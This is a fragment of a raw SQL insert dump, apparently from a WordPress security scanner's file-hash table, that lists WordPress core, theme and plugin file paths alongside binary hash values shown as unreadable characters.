����c��K','',0,'?'),('����r�>D�.�h�','wp-content/themes/hueman/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��]Y4-��3G|��I','G~�G$`�&V�G�f�T����η~�3��G��','',0,'?'),('��� �CW]9{���g','wp-content/themes/nirvana/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n*�qA��6:��a\n�','ƹ��N(&�=��@�\"�����e�Za\n<�&��','',0,'?'),('���v�����+H���','wp-content/themes/barletta/inc/wp_bootstrap_navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Qw8uLZ6����.','�h��w��:C_�����~ho�݌5\0�1��\r�d��','',0,'?'),('��S�Q�kIt�\"\"(H','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/logo-128x128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lˬ�2S�oP�+)','c[�[�����w4�k#������\0\Z�t�}�\\]�\r','',0,'?'),('Ö���vh���l��P','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��ZobS\ng5����','\n�)�^��	����`-��/��3{):?�','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�bҁ��-�E�Kc','wp-content/plugins/spam-captcha/core/lang/SL_framework-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�.�oh^��iN_J','�й�A��#!���%O�V�\Zi\nve<$pP','',0,'?'),('���o-�b����%ǃ','wp-content/themes/twentyseventeen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ծ��+�I��&','G0�3���X��q�Y����B��pt���r�L','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',0,'\0�YJ��!��J�L','\0�YJ��!��J�L','N6<��4�K\\�i>&�O�]v�=���','',0,'?'),('ֱ�u�U�s`� ','wp-content/plugins/spam-captcha/screenshot-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�%e\n)��\Z','��z\0�A�&�:���[��2뼌-��w,�','',0,'?'),('� \'Lu\n��;��','wp-content/themes/nirvana/fonts/yanonekaffeesatz-light-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��*�u�Hp#�{#�','V0����@�/�0)k�>�y\0~��\"��5','',0,'?'),('�n�%m�z�3nT�	','wp-content/themes/mh-magazine-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','阮��(h�͜�f	��','����c\':�啡ގ%-�W�?4�`�~�+','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('��?�B����;�\n�4','wp-content/themes/sg-window/css/scheme-1.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{v�.��-�&̴l','E���G�J���:�;���i��bN�_��S�F','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s>�g��Q�e�-�\'','�z���Oۼ��&�VE>P)��u(rG0��	','',0,'?'),('�@!Ñ=W���Z*�','wp-content/plugins/unyson/framework/extensions/breadcrumbs/settings-options.php',0,'��S���rQ��@��','��S���rQ��@��','R��Nj�`\n3	��L������O�6��*�KjC','',0,'?'),('����UI�/ /m�','wp-content/plugins/dw-social-share/assets/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��je�X���r','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('#��,���:���ͫF','wp-content/themes/tortuga/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�;@	�N�M�U�%&�','@\"ڲ~�n����b��O*��q�۟�=\Z	','',0,'?'),('�C���C*�v�\0�_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1ɪ�[�v����Y�','m5oA��K<�f�X]�zu,#	��3�s�ߵ','',0,'?'),('5J5]N���F�g�u','wp-content/themes/precious-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X����	#����#�','',0,'?'),('n/��zt�,��3a��','wp-content/themes/hueman/assets/front/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���)�/��%W�>','׈>*�M�<�L8�C��C<h[���}�,�','',0,'?'),(' <=��gip���h~','wp-content/themes/tortuga/inc/customizer/functions/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N<���&�F�\\g��Ⱦ','�1��K��3ƙ�Q(��y:s<l*���E_�','',0,'?'),('&@lL�G�#ck��_{','wp-content/themes/sg-window/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5��%����9ze','�E\"���Z�~6;`���+Q�z�/D��HJ`8�{','',0,'?'),('3���VK�,�|̡��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ۡ��;��','���cm�Pt��Z����D�)�ט���Gc����G','',0,'?'),('3�HW�؀�9�','wp-content/plugins/dw-social-share/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZU\n.O	�n2VK��2','OZ�W6�%�� R[�\n-�6\"�Up�!\\P8�ݬ','',0,'?'),('7kq������g>((','wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/%�5P�,`[�@6','�WEٺǎδU���mU�V��\r��O���z��','',0,'?'),(':�J:a�2\nC$����D','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zj;!�\'���?���','\Z�ˤ��n�sP@]��LU��9:pCl�5�G�<','',0,'?'),('>���rƤ����6h','wp-content/plugins/wp-date-remover/admin/partials/wp-date-remover-admin-display.php',0,'S�)��j^{�1�@�','S�)��j^{�1�@�','�2vzI��$D�h�b\\�*�g�\r�-�uPi�G ','',0,'?'),('J-u�xʄ�M�P�','wp-content/plugins/unyson/framework/static/css/fw.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6��0�2#�檹','\r�K�l��r���|�\Z�Ha���	�X��e9�','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('e������~Ь9�','wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�CĿ�b�u���','rsDS_\"?�3�%�k^�\'.��Ʉ�\\�Y}���','',0,'?'),('�v�\r����yXg���','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ru.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tƪi�`�p�i_@=0','B����C{��9�5O;��+�C�.���SD�*','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('�s���PI$���','wp-content/plugins/contact-form-7-modules/hidden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3���ު�','�\n�2Bz�?j�I���b[hMe{5\0A�6�W','',0,'?'),('�cl�#��r���ܔ�\"','wp-content/plugins/unyson/framework/languages/fw.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'%�R�YHl�Ԅ��','^����<��С;�aQ�;�&_0�P�1\Zp���','',0,'?'),('�ꩩo����(7�','wp-content/themes/alpha-store/template-parts/template-part-searchbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lh��и�)�Ks','2�c\0`��	�X`h�ť�A��\'Q��|�dWA','',0,'?'),('���[��B݌j�Z','wp-content/themes/mh-magazine-lite/languages/bg_BG.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ҢRg��/Z6<�Q�0','{IRz�1��k8�\r%8|t�;g��h���u��','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('ȭ{e\rwa� :�4W��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.alldomains.php',0,'Ƶ.`��a�Oq�','Ƶ.`��a�Oq�','\Z�����[\"\'�}6U��X?J��.-�֟D�','',0,'?'),('ϊ-o�1��\Z�	חl','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-azure-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eF�V�V�q[#���G�','��쌊��0.�ѫAx�&zJ�a+%>5�%','',0,'?'),('����տ�G�?�-','wp-content/plugins/spam-captcha/img/banner-772x250.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��\0�70�7�g`�','T�����]��ݧ��6�FyV�8e#��N8v\'','',0,'?'),('�W�y�`e�C�RB','wp-content/themes/hueman/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�=0���-Dm�&�','��XSv���N�@��w 8��J8��Au�C��','',0,'?'),('�f�E��B��a�X','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/options.php',0,'��@=���9�=^�st*�','��@=���9�=^�st*�','\n>Bsw&K���A�Ar*ҲgO��sJ�Ƙ��d','',0,'?'),('�뷎wh\\Xs����l','wp-content/plugins/wordpress-seo/admin/pages/network.php',0,'�_�hc��v��A.>�@','�_�hc��v��A.>�@','G��8�����\0��D\n<sUWY�A�G��y','',0,'?'),('��ΜǿCݍ�׷�','wp-content/themes/tortuga/inc/addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�|`dR�>��','�[?��x���UvWؚd%���\ZC�J~����','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!˳�J+����r�E%�','����C=@�絨s�X\'�y`�b�ټI���','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('�9�r`�`�7w�W','wp-content/themes/panoramic/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vՔM�7�Y�[M|','~�nI�5��&��r������h��^�Tqd*','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('�~�_QٍyJ�t�','wp-content/themes/illdy/inc/components/entry-meta/class.mt-entry-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.IA�\0�n�f?�d&�6','��J�k�k�5�@�M1S�\0t@Q�^�=l;�#','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('�\'xǧ_����\r�v','wp-content/plugins/unyson/framework/static/libs/jscrollpane/jquery.jscrollpane.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-V�O�R�Z�xYw','8��א�K��z&��rB��SC�,͏�a\0','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uH�+-x���i��k�','�!}�@�,Ж@���9�ڏ+��+{�4�4@7��','',0,'?'),('#ۅ\0���E�ֿ���N','wp-content/plugins/wordpress-seo/admin/class-import-aioseo.php',0,'��7��A(�T���\'��','��7��A(�T���\'��','D���k�\n��BS�+���6vvp(/�aAF�O5','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\r=6�H��΁_*Bq!�','o�YI)AL�\'����x*�5+x����W','',0,'?'),('C�tH����u�e','wp-content/themes/fabulous-fluid/js/jcf.checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5^DŽ�&7�C�1�;�}3','~�b?�[\'�����v\'��\'�|tR�K��7,','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|[��:�O\n]��','T״�Ɩ\0�}�)����!K�A	A�yS6','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��-���5��_a�_','!Pz4Y-C�i�Yk��-\0���nb:���a�[','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x]��.�@�$�Q��','#�0qH[�g���C\'�wE\Z�mK�!��ܿ��','',0,'?'),('htA��\'|{Kam�0','wp-content/plugins/spam-captcha/core/lang/SL_framework-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�:\".]}�ۖ��	;','.\nYj_�]������P7��.f�=�dy�6��','',0,'?'),('u�,N2F���3','wp-content/themes/verbosa/admin/images/image-style-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�He�²c��D�','��!������fv^x�~jw��N���mm>Q','',0,'?'),('}2۶Gg;6�yh�_2','wp-content/themes/sg-window/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{lK	s�1U����N','5�M�՗��	�\ZH�[�j�;�x$K�*��','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�`�C�0���H&a��','wp-content/plugins/unyson/framework/static/js/fw-form-helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�g�tg8[�\Z����','��~��Ë�1v/�7���I�\'��J6�Q���','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('��KGEEӉЂ:i\"�','wp-content/themes/hueman/assets/admin/img/footer-widgets-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cp��/j���r�','C�\0�K�=șW����\\��*�q�41\n�*���','',0,'?'),('���<�a��G��','wp-content/plugins/spam-captcha/core/img/tab_trad.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S]=�Dm���H�','�?#���C0�8XzȊ!��P&vaP��!,��','',0,'?'),('������Hdg4�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.networksolutions.php',0,';�;v�yO\'	2��*�',';�;v�yO\'	2��*�','Uӎ��D\'�\"O�\r�<�^K\Z��]��8k_�-��','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�N_�0P\\�7�>j�','L���;Q%~ș�IJ���w�[2����p�\0i','',0,'?'),('�&������2���','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��_�Y�l^g/a>x','~��Vf����\r�Ä���Di��9����#>','',0,'?'),('�ڙ\\���/>N*��','wp-content/themes/nirvana/fonts/yanonekaffeesatz-regular-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��t�?!Pt�҇+','(ԈM=�Q��N�l��Nbn6�/�����fм�','',0,'?'),('�9�n�~h�Io9�','wp-content/plugins/unyson/framework/extensions/update/manifest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�j!\nS�+�Uh`','�|�,]^�U>��+�q@GAդ\n�N����','',0,'?'),('��\r�@o�#�\\�','wp-content/themes/nirvana/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����cK��K��\Zv','�hi![T�姹rވ>�)��]�^���bR','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�M�J�ˀ��','���妌�=>7��%	�_�\0�ת$�ȔN����','',0,'?'),('�@ܳ����!~I��','wp-content/plugins/spam-captcha/lang/spam_captcha-fi_FI.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�C>�qW-(�M���W�','�S���?���ʥ>�&.��څ�������D♹�d','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('ԛ���16S\\0Bo�','wp-content/themes/relia/inc/customizer/panel-homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}���8o��(��\n�','O�q.Dh��\'{7;H�\r~��l\n�L���*','',0,'?'),('���8�1�Թȅ!sMo','wp-content/themes/travelify/languages/zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���\"ü��t��+','�M�h,��TQ2�V��!fזI+\\�#�h���','',0,'?'),('�J�����.�	��','wp-content/themes/nirvana/fonts/Oswald-Regular-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\r���~���-���@S','C�f�g�Ӓ/���dA�@��ύ��\0I\n�Π','',0,'?'),('��f��+e^>�!\"o[','wp-content/themes/sg-window/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\<aY\r�\'�<�@9','��g�!d���7N@(�crb�m;yCG�t�','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('瘩�Fk8��p�4}l','wp-content/themes/nirvana/images/columns/nirvana-column2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?Wt�%	|�d���‡','����{�j��X�S�֝�G�r׈]M��','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('��mW�{��AL7\"b','wp-content/themes/relia/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�,�Y;h�J','X\r�{��+r:l�j�[k_�re�2H���.��','',0,'?'),('��03XK��室�','wp-content/plugins/unyson/framework/includes/option-storage/class--fw-option-storage-type-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��;�a���p��','~�zm��ޘT�{�캸��n�Q�(=�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('���d�ƍg V��GD','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sk.js',0,'+�u=6M_�l0g �','+�u=6M_�l0g �','����]VUqG�R�2>���N�N�Eb7r','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('�[�Ƥ�\"�%MC','wp-content/plugins/unyson/framework/static/libs/unycon/demo-files/demo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)=CLI�^@I߫','��ޖ�T�a?g�%���!s8\'n��������','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('!���~\\�X#�,�	�','wp-content/themes/relia/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�Sש�::f��','���\"è��d+NL�\0��s�;�`��\"�Un�','',0,'?'),('%#� ��qt�<��','wp-content/themes/fluida/resources/images/headers/droplets.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x-��Dku���l�]	','�X�aT�<�畃�N���C���(̭�2w��','',0,'?'),('3�ͅ�B�(���l�','wp-content/themes/the-minimal/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ñ�;��m�Ev<��p','��<�7�Qp���u�P���4�0V\'In','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h؁S��C��+','0J�k���4��Fy@>\no�m(l`����]q�3','',0,'?'),('F#�N�&��&�v���','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/import.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0K�_�����:���v','�,�,)�x;#A�6v�^�ԩ����q��;?t','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\	ݟ�� �.L�\n���','�N���ݮ�n>)�J��*����ƿ�a','',0,'?'),('U�R�8������[','wp-content/themes/hueman/functions/plugins-compatibility.php',0,'l4�	g���p������','l4�	g���p������','j��hm��E��P #ysT�s��K<���Jj�','',0,'?'),('aQ��a��$��=X�e','wp-content/themes/square/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('c]�Ԇ�H��*\n��','wp-content/themes/wen-business/assets/css/editor-style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/7ro��bwNqˊ','�y�iw\rDN�$n�9\Z�e���s���m�S�v','',0,'?'),('f�><1��Ί��z���','wp-content/themes/relia/inc/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�s�0%w�Ѝ�','$-�W-f�����t�~L+�2���*��>ݿ��','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�o�	_��5�RO','�z �@=\n��<gkm��J�D��ϤA��ai','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sh�/���_y�Bjt�b','�pI: _�\r�A5��8����7�$�1\Z\Z','',0,'?'),('|�\"��HM��$���9','wp-content/themes/wen-business/inc/customizer/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O^�E��U-�4�9��','�%wu��]Q�G���S�\0Ò\'U(OX(�\'�:��','',0,'?'),('� ��̢\r���{/�','wp-content/plugins/contact-form-7/languages/contact-form-7-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z�O�G( [_(�','@+��ߏ����@���Ȩ�C�#/3G5�oh�','',0,'?'),('��ǥc�\Z$�L�*�u�','wp-content/themes/twentyseventeen/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@����c*ht����','�MH��ϛ�\"\r�٠�4�թ��!�	�ӆ�','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�C��%�j1�*��9�','wp-content/themes/mh-magazine-lite/languages/fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}.����C�voU�','��R6��%���F!=f����Ւ�q���X','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�s���9�\"�?','wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php',0,'r0(g�C���Ю�`','r0(g�C���Ю�`','&�_��{.�gh4�pec4Q\\�3=��LϽ�!��','',0,'?'),('����>��*���;','wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\012I�3�:����','_V�,�=�=y�!���k��x/�����R��1P','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','鄳YuMhEF�\Z�a',']��u�^Ŕ 